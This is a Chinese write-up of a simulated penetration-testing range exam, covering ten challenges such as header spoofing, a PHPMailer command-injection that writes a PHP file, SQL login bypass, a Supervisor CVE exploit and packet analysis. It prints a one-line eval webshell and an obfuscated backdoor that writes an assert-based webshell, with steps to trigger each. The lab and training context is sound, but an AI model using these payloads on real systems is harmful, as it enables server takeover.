记一次360众测仿真实战靶场考核WP
2020-04-07 10:49:23 Author: xz.aliyun.com(查看原文) 阅读量:534 收藏

1,微信 User-Agent头伪造

User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType/2GChrome/80.0.3987.149 Safari/537.36

2,PHPMailer远程命令执行漏洞

email填写:

"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com

message填写:

<?php @eval($_GET[a]);?>

就会生成一个 xxxx.php,内容是 message填写的内容,访问即可getshell。

3,登录框SQL盲注

跑了半个多小时盲注。密码32位的还有两个。。。差点心态崩了。然后突然想起。。登录框注入。。。万能密码不就好了吗。。。

4,Supervisor远程命令执行漏洞(CVE-2017-11610)

https://blog.51cto.com/eth10/1955450
直接用exp秒

5,Referer来源伪造

burp把Referer改成他要的那个Referer就好了

6,一个很简单的代码审计,也称不上代码审计的审计

代码如下:
<?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87') { $_=@fopen('t.php', 'a'); @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2])); @\$_(\$_POST[1]);?>"); @fclose($_); } ?>

先带个 ?1=GET.fPZ87 访问之,然后就会生成一个t.php,访问t.php的时候get带上 ?2=ilovey 然后POST带上 1=php代码就好了。

7,PHPCMS v9.1.x的

只有一个前台,其他功能用不了。想登录二维码也没有,当时没时间就没做了

8,一个加解密啥的。是一个exe,吃了不会反编译的亏

9,wireshark分析数据包的。还挺简单。有技巧的查找

搜索php找到上传的马。然后看那个马干了啥就好了。

10,wireshark分析数据包的。也挺简单。有技巧的查找

找上传者的ip地址。一个技巧:把POST请求的数据包筛选出来。然后从第一个POST请求数据包开始提交IP地址。过滤PHP,POST,HTML

最终总结:

一开始做的时候会很慌,特别是我做SQL时间盲注的时候,一点点的出结果,等的人都傻了,还好后面想起可以万能密码登录,就是要随机应变吧,思路灵活点就好了。放松心态就好做很多。

鄙人不才,像我这种菜鸡。最终也是拿到了分数

相信各位师傅也是可以的,加油冲冲冲!!!

更多类似文章欢迎关注公众号timeline Sec


文章来源: http://xz.aliyun.com/t/7547
如有侵权请联系:admin#unsafe.sh